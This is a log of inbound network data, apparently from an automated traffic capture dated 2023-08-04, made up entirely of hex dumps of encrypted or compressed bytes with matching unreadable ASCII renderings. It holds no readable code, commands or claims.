                                                                                      2023-08-04 16:48:40 UTC1730INData Raw: f3 1f 84 a3 5b 20 9a 1a b6 a8 86 94 56 85 85 ea a1 4c 21 df 9b 71 7d 92 e5 22 16 84 d6 61 79 52 56 23 7d 10 78 ae b9 3e cf 22 a9 bb cf a4 75 2c 78 e5 3f 4a d0 99 7b 29 df 85 97 23 10 89 bb a4 a0 90 f9 0b 8e 2a a2 40 a1 1e b2 a6 7e 19 d9 f8 12 81 20 0b 6d dc 09 e5 88 30 dd b4 41 af 34 cb ac 54 e8 b9 b5 77 a6 95 ef 8d 58 d6 86 c1 96 c9 c7 4b 89 bd df b1 e0 ce 5a cd 66 ba 8b 92 ed f1 7c 64 e4 de de 7a d9 53 b2 93 8b 56 78 7e d6 df a7 b7 d0 2a c0 c3 26 50 9e 4e a6 04 25 fc bd 02 1d ea 30 7f 31 62 b9 1f 07 84 f2 92 45 80 ef f9 a0 bd 61 22 17 be 6e f8 3f b2 27 d0 16 af df 97 53 b5 7d bf e5 1b cd ef e3 60 77 79 e4 af 38 74 f7 53 26 c8 ec 91 69 81 ab 41 16 24 56 9c 1a 29 a8 29 12 48 1b 48 f5 fd 9f 2f 54 d3 44 91 c7 9d 50 a4 15 29 5b e2 00 90 8d fd 84 e9 d1 f8 31
                                                                                      Data Ascii: [ VL!q}"ayRV#}x>"u,x?J{)#*@~ m0A4TwXKZf|dzSVx~*&PN%01bEa"n?'S}`wy8tS&iA$V))HH/TDP)[1
                                                                                      2023-08-04 16:48:40 UTC1734INData Raw: 23 cf 10 62 70 25 cc d7 de ad 80 5b 12 b0 7e b9 d6 72 38 77 3e 93 57 04 36 6f 9a 25 c9 12 71 44 0f ed 0d 2f 9e 94 2e 34 a8 7a c3 b1 14 fa 09 52 87 80 96 75 60 de 6c a2 e7 37 79 7b 77 49 14 25 d4 c8 b7 6b eb 16 e0 87 fd 78 cc de 63 31 fa 1b 50 c5 5f 9d 39 01 38 8e 79 fd 88 80 f6 59 16 56 a9 be 7f 04 ac d9 9b 22 0a 09 b7 21 5b f5 a2 33 8f 5b 40 90 8d f5 05 b9 c6 c8 fa 7b 07 95 7c b4 4f 10 46 0e 50 5e ca 96 5c ec 88 05 b6 ce 5d 70 2a 27 f7 91 93 b0 39 e1 4c 36 ee b1 71 3d a3 ac 74 76 5f 94 da 22 7e 53 56 71 70 97 4c c7 1b f1 67 e3 8c 2f 68 d5 1a 61 79 6c 01 ba c6 9e a1 aa 24 16 8d bd c2 93 37 44 95 a5 32 50 83 94 02 fc 7c 94 bc 2c 64 51 a8 f7 01 b4 31 60 a4 62 b8 33 fa c2 80 fe 8a 33 81 3d 5a 99 c4 ad bf af 14 2d f5 c7 68 f2 7d d1 30 d3 aa 12 3b c0 62 6d e6
                                                                                      Data Ascii: #bp%[~r8w>W6o%qD/.4zRu`l7y{wI%kxc1P_98yYV"![3[@{|OFP^\]p*'9L6q=tv_"~SVqpLg/hayl$7D2P|,dQ1`b33=Z-h}0;bm
                                                                                      2023-08-04 16:48:40 UTC1738INData Raw: b1 32 fc 77 b8 63 47 0a 78 0e 9b 5a ce 27 c9 05 f9 7c 5a a2 00 d6 dd c0 f2 43 c7 93 4f 79 1e e3 12 7b f5 53 25 2f 59 c2 7d ed d8 d9 f3 40 aa f6 5a f0 e8 8f a6 53 0a ec 10 45 83 f5 ef 9a e8 4b d5 e3 9c 19 bd 50 79 78 ac 58 cb 27 04 fa 96 eb 4c e5 45 8d 64 61 7c 5a 5e 84 be cb a3 e5 24 84 32 6e 02 64 8f d0 6b d1 50 e6 25 f3 fc f1 a7 48 02 3f 59 21 75 a0 62 d2 00 3c 9d 5c 77 2a b6 2d ae 94 05 6c 9a 9f 3f 7e 01 a1 63 bc 06 3d 29 39 68 6e 4f ba c8 1c cc 4b f2 02 67 4d e5 a9 35 a8 fa 1d db 7f 7f 3d 5b 4b 0b 34 69 b6 4d fe f0 83 4e f9 28 3b d8 34 c3 18 b8 f7 f6 bc ce db 0c d7 d5 51 72 a7 9e 65 42 0b b1 c3 1b 6c f7 63 9b a5 4f 0f bd 19 69 c9 ea e0 f2 97 c8 83 82 9a 07 11 55 49 ae b2 48 72 35 48 c4 64 db 97 06 d2 8f 6e be c0 19 d4 c0 ed cb b3 d4 f0 af 5c 2b 3a 0a
                                                                                      Data Ascii: 2wcGxZ'|ZCOy{S%/Y}@ZSEKPyxX'LEda|Z^$2ndkP%H?Y!ub<\w*-l?~c=)9hnOKgM5=[K4iMN(;4QreBlcOiUIHr5Hdn\+:
                                                                                      2023-08-04 16:48:40 UTC1742INData Raw: 1f 7e c6 61 cd 79 10 74 34 f2 86 b8 59 ec b1 17 e8 7b 59 a9 02 6b 4f 8d 92 f6 f9 25 18 45 ab df 41 00 c9 c0 ac 1b c5 00 f2 8c e0 fa 83 98 b6 ec 5a 07 b5 f5 3a 03 58 48 34 2a 0d 22 d7 3f c5 ce 2d 2b ef d9 75 d6 4d d1 72 0d 72 bd d9 9a c9 12 9f a1 69 62 f6 52 52 82 7d 35 40 39 ff 8d bd e4 9c 79 a6 13 9e e8 32 d8 69 ef ef a7 5b f2 9c 2f 2e 5e 5c 5f 67 65 a3 d5 c9 a0 f4 9d f0 8a 55 ab 0c 09 9b 8a 2e 93 21 5f 40 45 c9 3b 1b 00 bc 82 50 9a b4 b4 7f 0b 0e 41 68 b5 8f 12 82 d2 78 48 ad f1 d8 90 59 52 8c a0 26 0c 93 a0 c0 d9 3f c8 0f cb 14 49 15 78 42 74 01 f5 4f 45 2d b6 4b 59 9a 89 af e7 38 19 5c 7e ac e5 88 57 32 c1 96 3f 01 19 de 1f 98 f7 52 fa 65 f2 7b 17 bb 58 44 39 9c 60 1e 2c 3a ac 94 06 a9 ff ce d6 9a 53 d8 75 02 45 0f fc 75 06 52 95 64 64 8d 02 ad 52 68
                                                                                      Data Ascii: ~ayt4Y{YkO%EAZ:XH4*"?-+uMrribRR}5@9y2i[/.^\_geU.!_@E;PAhxHYR&?IxBtOE-KY8\~W2?Re{XD9`,:SuEuRddRh
                                                                                      2023-08-04 16:48:40 UTC1746INData Raw: 51 0e 2e 5d dd ad f4 61 61 02 b2 07 2d a9 1f 41 58 66 cf 29 0c a2 1b a5 f4 83 06 7c 5b aa 5a 9f f2 49 4a 12 e7 35 25 87 e9 1c 4a 30 0c 1d 34 15 fa 0b 4b d2 78 a6 cd f6 87 81 c7 1a 60 8a 3f 85 4e 47 51 84 18 dc d1 9b 8b 6e e9 2c 24 d2 cf 76 c9 8c e0 47 fd 11 66 63 d5 7a e6 e5 dc 1a 3d c9 b5 f0 93 76 b7 e2 f4 e2 35 5f ee b6 b3 a9 93 3a a2 f3 ab 34 68 e0 62 03 42 39 be 88 cc 80 2d d7 5e b0 d2 8b ea 7e 72 4b d8 fb 6c 36 ed ba 3d 0c 88 57 33 b8 12 cb 29 a1 5e 54 5f e4 6e fa 73 d1 00 73 ff ae c5 97 2a 8e e7 bc 95 66 5a 14 46 3e 5d 98 5d 1e 89 95 89 6c 09 77 fd 21 0b a2 7f d8 b6 32 39 e6 2d 65 23 33 0b 6b 7c f6 67 00 a2 f6 14 9c 00 c6 84 8c 50 04 98 2d b8 23 fa 05 68 68 27 43 b0 8a ce ec 18 56 cc 39 39 4c 0e 7f b2 0b d2 8b 10 78 f5 94 32 69 2e e3 82 37 36 20 49
                                                                                      Data Ascii: Q.]aa-AXf)|[ZIJ5%J04Kx`?NGQn,$vGfcz=v5_:4hbB9-^~rKl6=W3)^T_nss*fZF>]]lw!29-e#3k|gP-#hh'CV99Lx2i.76 I
                                                                                      2023-08-04 16:48:40 UTC1750INData Raw: 2e a3 ee 0b d0 c7 84 3c f8 b2 5b dd e2 e3 1f 93 38 ba e4 af 9f 6b e8 0b b4 c5 f0 0b fa 84 5b ad 2a de 2a b9 c3 6e 93 31 49 82 0c 77 eb f2 2a 77 35 95 4b 28 86 b8 6e 8d 5f 5a 6b e8 40 e5 16 d7 5a 94 0d 23 e0 2f 4a 46 f3 f0 40 58 c0 7d 9c c2 fc a4 b4 45 bd 06 90 8c 14 d6 68 eb ec 83 92 bd c6 4d 4f f4 86 51 dd e6 f0 d1 28 d8 20 48 77 c8 43 3a bc 61 71 c5 1d 59 f9 7f f1 75 a3 56 3e a1 7f d3 0e 7a 62 76 d4 5b bc 9a ec 9a d5 0b bc 09 bd 0f bc 46 9b b9 68 da 8d 58 95 98 dc 20 8b e2 00 91 27 2d 86 f1 98 9d fb f9 47 6a 75 51 d3 1e 8c 37 0e af 06 b0 eb 46 f7 c1 80 d1 d7 95 0b 06 65 46 fa 7b 6f 80 19 ec 35 1e 17 dc 20 4f 00 ed e7 2a 5e 61 c9 18 25 3c c1 0c 19 fc 25 85 d2 e4 67 a5 40 a4 5e c3 8d e6 5b 64 41 5a 6f 4c 4a 1c 25 87 ff af 79 a5 0b fa 0f 08 0f 4e a6 0a b2
                                                                                      Data Ascii: .<[8k[**n1Iw*w5K(n_Zk@Z#/JF@X}EhMOQ( HwC:aqYuV>zbv[FhX '-GjuQ7FeF{o5 O*^a%<%g@^[dAZoLJ%yN
                                                                                      2023-08-04 16:48:40 UTC1754INData Raw: c5 74 a4 79 06 8a 80 37 93 e5 56 6e 7f c0 94 1f 67 8d cd 93 a4 82 c9 cb ca 58 0b bd 3b 8a 03 50 1f 5b 21 61 6e 25 07 7a 2b 69 ba 44 3a a1 cb 3e 51 0e d0 d2 40 f3 bb 66 10 3d bc 42 68 66 6d 83 33 6c f2 de 64 ce 8e 0d 38 8e 26 e6 e8 90 e6 72 d5 24 a7 03 49 5c 5d 0f 23 76 fe e9 9d 6d 40 e6 19 25 6c 03 bb ef 24 31 21 a6 06 39 1a 57 8b f1 95 df 42 51 11 18 ad c8 1f c7 3d 5b b2 0a 9a 89 66 d0 c9 59 1f 9a 2b f6 e6 ec 01 16 24 ca fc 5f 02 35 62 21 a2 82 d2 d8 37 97 a3 5e 07 e7 9b e8 2b bb 53 ee 37 74 9f 61 d6 28 f9 0b 85 32 80 0d c6 88 10 29 28 1a b7 b2 54 23 64 20 ec c4 0c f1 ba a5 69 cd 6f e5 6a 4a ac b3 d4 fe 6f e8 ec 7d 1a 8c c7 99 8c 37 29 bb fa c5 cc c6 a3 69 c6 b6 1e 3c d5 a6 1a 2a 35 08 a1 69 80 d3 20 16 76 eb 32 94 48 86 09 f2 b4 2c f8 72 99 8a b0 fe 58
                                                                                      Data Ascii: ty7VngX;P[!an%z+iD:>Q@f=Bhfm3ld8&r$I\]#vm@%l$1!9WBQ=[fY+$_5b!7^+S7ta(2)(T#d iojJo}7)i<*5i v2H,rX
                                                                                      2023-08-04 16:48:40 UTC1758INData Raw: 24 be e6 1e 57 39 8d bb 29 62 da 70 d1 dc 9a 10 9d ec 42 4b 90 53 d7 b2 bb 44 48 1f bf b9 dc f6 37 d3 36 20 1e 36 74 21 1d ae 3c fc 61 fa d4 7e 34 46 72 72 30 6d 42 13 0c 1d e4 ce a0 39 73 20 d4 ff 83 6f 77 68 64 53 6f 6e 4f d1 6e 02 cd 29 59 c9 0a cb a4 3d d8 dd 93 48 91 53 d9 b7 eb e2 a4 bc 6b 93 1b c0 6d 74 e5 cf 8c 21 26 d2 9e 37 5c ed 31 80 54 07 be 1a cc 29 c6 7d de 04 06 07 0c 09 2f 65 ee cd 8b 0f f3 9d b2 92 02 28 ae 2b ad 99 7e 58 f0 a4 4e a1 be a7 d1 9f bc 8b 08 56 05 46 45 9a e8 c2 99 d9 a9 ae f8 48 9f 46 57 73 46 9a 15 ad 0c 67 e8 fb bc 93 96 79 89 8e 17 a0 2e dd 9b 22 ca 9e 77 19 36 59 1d 94 eb 1b 8d 40 81 81 b7 f4 dd 41 77 5d b5 c7 b7 a4 71 2b 65 1f 5c eb 3f 61 43 81 ec 1c 06 2c 61 a5 50 44 fa d0 0a b8 fe 8b 7a 82 fd 4a 82 cb e5 a8 43 d2 5f
                                                                                      Data Ascii: $W9)bpBKSDH76 6t!<a~4Frr0mB9s owhdSonOn)Y=HSkmt!&7\1T)}/e(+~XNVFEHFWsFgy."w6Y@Aw]q+e\?aC,aPDzJC_
                                                                                      2023-08-04 16:48:40 UTC1762INData Raw: 2c 23 9b ec e5 d2 e9 a2 06 c5 71 56 73 fb 6c 0d 95 ff 20 86 82 d5 83 e1 9b 34 dd f5 41 05 10 02 0f be 57 14 80 ac e7 16 ac f2 e9 46 c8 2f de e6 1e 2d 78 f7 45 48 e0 2b 33 90 e6 44 9b b7 0c d8 b6 f1 84 c9 e6 ce d4 1e 2b d0 3f 67 b6 17 52 2b 9c 22 a4 5b 18 40 42 ed 8b 29 3b 55 08 2c ad b5 d2 97 d5 c3 e0 92 73 17 e8 06 a3 ef a9 c6 17 ee bf b5 b3 cb ad b6 95 ea 07 b4 71 02 f0 d9 10 0d 50 2b 19 25 5a fe 88 38 e2 9d 6b 1a f4 4e ea ef f6 05 de f3 dd 71 25 85 2f b0 50 44 b2 d5 45 cb 7e d3 90 1a 55 4b 1f 0f b9 81 23 d1 64 1a 2b db 67 f8 09 72 00 e4 77 e6 53 6f 09 0f 08 9b fd 56 c7 c5 1e ae f3 33 5f ad 9c 77 15 fd 06 63 d4 90 d9 ff b8 ba 91 dc 92 5f 0b 36 82 bc f7 c9 de b3 54 2b fe 10 2d a0 2c 88 02 92 37 67 71 b3 6b 2a 9d bc 2e 66 06 96 a8 e9 fe 6e 99 1a 33 ba 8a
                                                                                      Data Ascii: ,#qVsl 4AWF/-xEH+3D+?gR+"[@B);U,sqP+%Z8kNq%/PDE~UK#d+grwSoV3_wc_6T+-,7gqk*.fn3
                                                                                      2023-08-04 16:48:40 UTC1766INData Raw: 07 47 51 4e ef ac 6a 56 00 f1 34 53 df 17 15 d5 b4 b6 30 63 10 95 78 20 dd 41 8e a6 12 7c 97 e6 bc 33 e4 31 68 89 11 23 2c 1f 56 b0 43 5d ca 53 7f 1b 2c ee 06 9e 2e 92 18 57 5e 2e 2a bb 16 24 32 5f 29 f2 3b 71 33 7c a0 1a c7 8d 61 86 f8 ea 89 38 e1 1f d3 2f 87 2e ed f8 07 6c b1 35 92 ae 2d b7 66 39 5b 72 f3 51 c1 5e 1b 59 68 3e 65 4e 2b a8 b5 3b 9d c7 28 69 76 50 4b 2a 82 4c d7 46 35 0e de 6d b1 1a b8 25 ed 7c cc 79 ab e3 d0 3a d2 c3 38 28 bf 0b 25 0f 29 cf 4f b9 35 af 55 3b ea 49 94 40 23 72 a7 8a a5 fd a0 0f c9 bb 92 28 a0 03 6e fd 36 f5 5b 15 88 fe d0 95 ce ae 26 96 bf 61 0b b2 2c 27 53 1d 46 8a b7 5c 5e d3 aa 41 5b d2 82 2b 7d a4 f6 4a d0 e6 91 8a b5 fd 38 da a7 ad 17 f4 bc 4a a1 10 ad 32 67 2e e9 fb 81 ee 5f a8 fe ff fa 8a 76 48 ac eb 01 0e 86 0d cf
                                                                                      Data Ascii: GQNjV4S0cx A|31h#,VC]S,.W^.*$2_);q3|a8/.l5-f9[rQ^Yh>eN+;(ivPK*LF5m%|y:8(%)O5U;I@#r(n6[&a,'SF\^A[+}J8J2g._vH
                                                                                      2023-08-04 16:48:40 UTC1770INData Raw: f5 fc 59 ef fe e5 e6 72 94 5c 45 d7 7a 15 c4 ad 0c 8a 24 8b 91 06 7d f9 03 93 d3 dc ec 65 74 d7 bc 2f 52 95 f9 bd b0 e3 58 11 06 8e 04 e0 eb 25 fd f1 dd d8 47 3f 2e 1f 5c 64 07 30 87 c7 cb a4 01 8a d1 1d 60 95 4d 65 ef 3b 66 fa 02 34 6e c9 5c c8 e6 ca de 32 51 ed 73 22 da 9e 1b 20 be 36 b6 a1 d3 4d 6d 04 02 5e 5f d9 d9 14 45 7a c6 4f 50 d7 31 7d 97 0f 43 fe b5 1e 6b 70 cc a5 92 27 2f 2f c4 33 71 67 9d c2 c3 0d 87 e3 b9 3f b6 db ae 50 16 d7 44 6d 04 36 b5 c2 d8 5c 71 cf 9a 30 b4 bb 0e 9f be d8 5b b4 4e 45 b3 36 e5 bf 51 a9 f1 ee e3 4e 65 eb 4f fa a5 20 7a e0 94 41 98 43 e1 ab 57 ef e2 7d 26 16 88 6a 7f d6 a6 e1 01 6a 99 f4 05 99 5c f5 f0 a9 0d 2d 08 18 cb db 0e b9 46 76 df 3d 96 65 82 9c 9f 0d 00 bd 28 6c 1f 27 59 a8 fe ee 68 15 c6 48 28 1b ef e7 02 86 cf
                                                                                      Data Ascii: Yr\Ez$}et/RX%G?.\d0`Me;f4n\2Qs" 6Mm^_EzOP1}Ckp'//3qg?PDm6\q0[NE6QNeO zACW}&jj\-Fv=e(l'YhH(
                                                                                      2023-08-04 16:48:40 UTC1774INData Raw: 46 29 73 6b 58 68 c1 61 7e 02 85 7d aa 17 c6 f9 d2 d3 b2 54 93 17 6f 65 f3 ed c3 ec 1d 8e cb 7c ef fd 7e 29 12 c6 00 42 ef 59 70 e5 b2 44 24 9d d2 44 b7 36 86 d4 de cd e5 3c 8f da fc 57 3c 54 ac 66 f1 8c 2c 14 fb 7a 80 51 15 80 40 45 8b c6 b3 ac 46 f5 78 e1 19 08 32 d4 36 19 3e 50 d3 5e 9a 59 65 b5 de a2 e7 98 b6 59 55 b9 ac 73 37 70 98 68 e5 9a 6f 5a 6c 29 88 4e fa 80 94 6e 54 3d 6e c1 53 9c 99 85 88 a5 af 76 ce 9a b2 ec b9 43 b3 36 d5 23 1d f6 86 4e 64 52 7b af a0 38 00 70 4f 3f 7f bc f7 60 ad d3 75 0b 02 df ed 27 95 11 49 1a b3 bd 42 11 53 d7 1b e5 62 86 14 e6 5d a5 b0 52 34 b9 8f ef 6b 36 4e 84 71 b4 d2 b4 15 cf 48 b4 79 f5 89 b7 8d 54 f4 b2 ee ef 05 f5 40 84 6b 7b 4a a6 43 ce 59 9c b9 1e 05 9f 87 fc 1d 43 55 66 40 3d 4a 1a 46 f7 85 76 73 12 64 a2 99
                                                                                      Data Ascii: F)skXha~}Toe|~)BYpD$D6<W<Tf,zQ@EFx26>P^YeYUs7phoZl)NnT=nSvC6#NdR{8pO?`u'IBSb]R4k6NqHyT@k{JCYCUf@=JFvsd
                                                                                      2023-08-04 16:48:40 UTC1778INData Raw: 03 5c ea 74 67 a0 1b 5a b5 07 5b ee 39 ce b7 c4 d6 15 99 a8 ee 4c a7 8f 1b 67 e3 38 76 85 45 fc b2 c6 51 68 78 7d 44 da 4d d5 2a 7e fb 62 b4 ea 5f 20 4f f0 1b 02 c7 c9 7b 64 aa 50 46 ab b9 81 5b 13 8e f5 61 45 c3 fb 5f 4e 84 ff 7a 34 e4 90 61 ae 9a 34 58 22 b7 ec 7e bd 5a af c8 a5 39 4e 3e f6 41 d2 5a 38 f1 03 61 fe f0 d0 e2 89 83 11 23 74 eb ef 39 e5 96 92 9e 16 00 c3 33 da 39 a7 54 74 7c c3 92 d9 65 85 2b d0 3a a0 f4 f0 a5 ec f0 25 d6 b1 59 16 fe b0 e4 52 92 2f 34 e0 83 f3 4d b8 35 9f 2c c0 c2 b3 37 b8 42 94 e5 fa ce 2e ba 8b 37 dd 72 69 88 c2 f2 21 9a 0a 66 2c c5 ea 4a 43 9d 31 50 49 95 f4 ae 7a e3 2a bc f7 f2 b4 dc 6b 8e 17 c9 80 96 76 af 8c de e1 80 94 5f 48 88 3f f9 33 35 27 96 24 65 f7 01 58 ea 80 1b 8f 10 b7 2b 8d c7 f3 be 1f 8c 44 a8 8c f8 6f 41
                                                                                      Data Ascii: \tgZ[9Lg8vEQhx}DM*~b_ O{dPF[aE_Nz4a4X"~Z9N>AZ8a#t939Tt|e+:%YR/4M5,7B.7ri!f,JC1PIz*kv_H?35'$eX+DoA
                                                                                      2023-08-04 16:48:40 UTC1782INData Raw: 76 00 eb 81 d4 65 87 d4 ae 5d a9 fe d5 4a 45 d6 09 de a2 84 fb cd 51 88 d8 f8 1b 58 b7 cd 32 88 d3 ec db ce ab fe 9b e6 60 be 4d 39 3b 76 e9 14 80 f2 91 4c 4c e6 1d 4a 8a 89 0f e0 0b 4b 6f 44 f9 2e 04 98 b7 88 87 4f 7d c5 b5 b0 e1 37 21 6e b6 55 1b 62 e5 1b 10 3a 44 13 68 05 51 ed d5 c2 aa 4f 00 15 51 2a 42 fb 2b 1d a7 bd bb cc 31 b9 a2 88 d3 44 34 c4 a5 93 3b ad 72 f1 32 3c bd ce 7a 76 b2 58 31 0a 83 9d 10 ab a4 72 fc 02 b2 1f 18 35 96 ad da 71 cf b0 77 36 60 b7 b7 47 2a 0b 33 3b 58 6f 2d 60 47 9e 2c 68 46 0c 52 15 2f 33 69 32 3c b8 eb ee e3 bc 1a da 9f 38 1d a2 5e 27 9f 40 90 99 3c d5 0e 68 5b f0 38 bb fe 93 71 2e 2b fb 1c 37 14 ea 09 93 9e b0 66 ec e6 69 21 15 9a 46 fe f0 98 f9 ac ae d1 b0 b9 90 6a bb c7 d0 5a cc 85 e0 0f d8 03 68 01 a2 49 44 6b 68 c8
                                                                                      Data Ascii: ve]JEQX2`M9;vLLJKoD.O}7!nUb:DhQOQ*B+1D4;r2<zvX1r5qw6`G*3;Xo-`G,hFR/3i2<8^'@<h[8q.+7fi!FjZhIDkh
                                                                                      2023-08-04 16:48:40 UTC1786INData Raw: 22 74 57 a2 74 55 0d 8b f1 f6 59 17 9c 41 61 a3 4e b1 77 c4 ca f3 5b 8e a3 84 74 84 0e ad e0 c6 a2 32 34 07 92 51 43 1a 16 82 bf c4 2b 3e d0 7f d6 e9 aa 46 03 31 41 9c 3d 0f 6d 03 98 c3 e6 ec 66 d4 fe b3 ae a0 52 bb 59 ab 01 51 9b 65 b7 1b 38 22 ba 9c 5d 86 8f 6c ee b7 35 5f 30 3d ff c0 17 a6 42 8f 83 1c c8 7c fe 03 40 c6 4b f3 90 44 f0 aa a8 64 21 21 a3 be dc 3d 86 5b 22 60 cd 12 2c a4 e4 45 5d dc d8 6f 68 ea d0 36 ab 6a a7 78 81 f9 3d ab 60 a4 38 c8 5d 87 b6 60 0a b9 d1 69 c8 c5 7d d6 a1 17 dc e6 8f 82 58 61 5e a3 02 ee 3f d0 04 a9 ae b2 7c fd 1e 8a d7 70 60 04 d4 03 d9 ce bf 0f f0 67 fc c7 cc 91 82 b6 fc f6 e0 30 cd b3 18 4b 85 0b cf 35 7c 9c 07 c2 b0 64 f4 8b 66 c1 6c 56 2f 0d e8 9d 44 07 89 1d 3a 94 44 a5 f1 63 8a 96 5a f2 20 f2 49 50 2b 7f 66 e7 6a
                                                                                      Data Ascii: "tWtUYAaNw[t24QC+>F1A=mfRYQe8"]l5_0=B|@KDd!!=["`,E]oh6jx=`8]`i}Xa^?|p`g0K5|dflV/D:DcZ IP+fj
                                                                                      2023-08-04 16:48:40 UTC1790INData Raw: 94 4e dc fc 71 fd 39 3d 47 5a 65 13 e3 95 c2 66 be 57 98 7d 95 59 3d 06 1a b4 74 62 08 d1 8c 65 c9 43 d4 25 3b cb d9 6d 36 a4 c8 18 de 9f 97 33 33 9b 0d 7c 32 c0 b8 d8 f5 78 34 43 0c 1e 69 f1 55 15 2a 3b d3 ac da f2 1e ea 2f 78 b3 67 8a 1c fa cd 01 2e a1 ed 2b 32 7c 9d 7e 28 84 e8 e5 2d bc c5 07 a0 15 3e fd ef 41 91 20 29 12 b5 c2 c1 fd 0c 4a 07 6b d7 a5 54 6d 1f 67 9f 95 5e 59 40 c6 a5 f8 ed 96 e8 30 d3 dc be 87 67 e3 15 b3 e3 36 95 2e 35 82 7b 7b 8d 6a a2 d1 9a 33 d0 ce 30 7c ba dc a5 62 40 fb 07 c4 81 fd ab 15 d9 d8 73 b3 01 46 b8 3c bf 28 e2 43 c3 b2 05 79 f8 65 7d be f4 72 e2 3c 35 a8 fc ee be a2 7b 1d 6e 89 1f 71 51 1f b6 d3 df 4d 32 76 c8 45 b1 f7 6b 91 e2 39 0d 17 8d 2d 1c 2d d3 d6 d2 e1 64 81 7d 38 af f5 1b e5 51 b8 34 4e 01 4a 5c 66 b3 52 ff ba
                                                                                      Data Ascii: Nq9=GZefW}Y=tbeC%;m633|2x4CiU*;/xg.+2|~(->A )JkTmg^Y@0g6.5{{j30|b@sF<(Cye}r<5{nqQM2vEk9--d}8Q4NJ\fR
                                                                                      2023-08-04 16:48:40 UTC1794INData Raw: 6b ac 30 61 c4 21 ef 3b e3 e4 d2 c4 da 89 91 53 28 aa 9d e2 e5 28 12 97 f4 ad 8f 04 a7 aa 20 b7 fe a7 f2 45 16 22 66 60 fe 24 87 a7 97 5c 4b 1e b5 cc 71 8e 1c be 61 bd 4c c5 9f dc c9 7e fc 7c fc 62 42 f0 7c d2 42 69 9d bf 92 0b 54 ff 97 0a 8d 52 7a 2d 1d 33 f1 5e 2a cd 59 90 19 10 e4 bf 34 b9 11 da ce 69 cd 6c 47 3c 9f 58 19 b5 1e 7a b0 a2 65 74 d7 94 01 7d 70 16 da 83 51 66 94 51 59 ee 46 3d d5 a3 55 6a 09 6d b4 41 f9 5d d0 fd 4c 05 4b c0 51 8c 65 59 11 c9 ad 3d 82 04 f9 bd a4 a3 7f 23 7e 07 3f b3 c1 bc 78 ca df 95 e1 f9 ef 67 6d 92 d3 51 11 f1 c5 de 0a a8 d2 12 df ee 93 dc 51 ff bb d6 73 9c 39 fc f6 ca ed 74 9c 3e 42 52 97 bb 2a c8 a1 8d 8a 65 47 24 90 2c be fd 51 40 fb 55 ff a2 89 b2 c7 b3 84 1c b1 e9 f9 6e 84 a5 e7 d1 59 bf 09 cd b8 c5 da 8f 9d ab 1f
                                                                                      Data Ascii: k0a!;S(( E"f`$\KqaL~|bB|BiTRz-3^*Y4ilG<Xzet}pQfQYF=UjmA]LKQeY=#~?xgmQQs9t>BR*eG$,Q@UnY
                                                                                      2023-08-04 16:48:40 UTC1798INData Raw: bd b3 63 6b 18 60 9d e0 0e ce f5 4f b5 90 6d 2c 29 89 98 95 7a 8c b6 7b 6f 87 96 1d 02 1e 15 55 ad bd 14 37 77 c4 84 3f 09 9e bb 11 1e 36 32 d7 db b7 79 3a 3a d2 31 91 ae 0d 64 5a b8 e4 7b d3 8a c0 4b 66 64 70 5c df da 1b df c7 e5 a3 1e ef e8 af 03 24 5a 11 9b 30 da 18 71 c4 fc 7d e7 85 05 4b a9 d5 b3 4c f9 9e 2f e1 91 5d df 2f ab 39 1c 6e c0 93 3f 80 9b d8 b5 31 b2 0f 4b a9 1b f2 af 38 a9 d1 f6 41 13 e9 c1 a5 2b b6 f0 e9 21 1c 5f 63 9b 5c 39 55 74 94 62 a9 df ed a7 f8 3a 1a 41 7e a6 0b 62 e4 f0 58 b3 1e 77 98 08 d7 01 59 d1 ae 7e 9b 3d 93 b8 36 14 a6 f0 62 bd 61 3f 7b af 03 73 29 d9 31 e7 af 63 c7 13 24 80 c0 41 b2 99 24 42 c0 c6 17 f3 36 fb 11 e2 00 fa 5a e8 97 ca 75 4b 5f d1 f7 88 a9 f1 db 6b 71 83 88 8b 3e d1 8c 88 38 c0 a5 49 6d cf b5 b7 8d d5 f1 66
                                                                                      Data Ascii: ck`Om,)z{oU7w?62y::1dZ{Kfdp\$Z0q}KL/]/9n?1K8A+!_c\9Utb:A~bXwY~=6ba?{s)1c$A$B6ZuK_kq>8Imf
                                                                                      2023-08-04 16:48:40 UTC1802INData Raw: 4f d9 fa 2d 9f 4b 2c f0 45 82 f4 d1 9f dc e0 3f 5d 3a 48 db 09 9a 39 f9 d6 1a ec 47 96 5f 34 03 e5 ea 0e d5 9c 1b db fe b9 b2 83 2d 80 d2 7d 1f 29 5d 62 ef 6b e9 9a 6d 06 fd 86 25 0f f3 d9 96 8f 7f e7 ff dc 23 fb 3c f0 73 30 24 a9 86 b8 bd fe cb 82 c3 f2 2d 7a 27 ee 4b d2 da 49 57 c1 e4 7f 05 99 69 e7 b6 be 0f b8 e9 26 ab 51 11 02 30 b5 f3 01 ab cc ce d7 e4 54 52 83 34 22 d0 bd ce 5e 1f 78 4f eb 1e f5 ce 50 6e c2 e3 18 1e 06 fb 0c 51 22 b6 95 7f 2d 30 94 d3 c8 d4 99 e7 b7 de 89 65 67 cd d0 9f 51 73 81 22 e5 4a 3d ab 30 2e 0b f2 4c e1 ec 3b 6c 12 02 24 46 e0 c0 dd 22 d7 07 37 5f 0e c1 ff 04 e4 16 bb 69 2a ef 20 bb fb 3c 44 52 41 52 a9 cb b7 32 41 68 63 1f ea 42 24 d9 66 70 f8 73 f7 f3 39 03 b4 54 de 5e 97 4e c9 a4 77 80 28 73 50 b1 83 b8 f8 85 21 a5 f3 c9
                                                                                      Data Ascii: O-K,E?]:H9G_4-})]bkm%#<s0$-z'KIWi&Q0TR4"^xOPnQ"-0egQs"J=0.L;l$F"7_i* <DRAR2AhcB$fps9T^Nw(sP!
                                                                                      2023-08-04 16:48:40 UTC1806INData Raw: b7 13 94 16 09 25 56 43 73 93 46 a5 27 95 e2 7a 12 4b cf fb ff f1 bb dc 8e ec 6d 5e 76 60 c3 32 23 88 52 87 36 49 1b fa af 3d 6a ba 31 06 0e ed 01 2d b1 d2 27 69 4b 7b f8 4e f2 18 49 9a de a5 e4 8e f6 2b 59 f3 d4 bf 01 fe f9 c2 3e ba b1 9e 4d 17 79 a8 1d 13 6c 35 21 a5 bd cd 65 dd 1d c6 7a 49 c8 07 db 74 c4 40 96 92 05 47 fe 4d 3d d6 c4 8c b2 51 ca 1c 1e f4 be 70 8e a5 5b d0 76 f3 74 45 e0 b4 23 80 62 72 e6 2a 21 a9 86 3c 87 5c db fe 95 78 cd cf 82 29 03 0c 14 e3 e2 d4 06 c8 25 72 b6 54 59 62 fb d4 cd 0b ef 67 c7 d1 93 d0 cd db 18 56 e9 e1 3e b8 4f 4e 22 5c 65 1e 0a c7 62 26 24 55 31 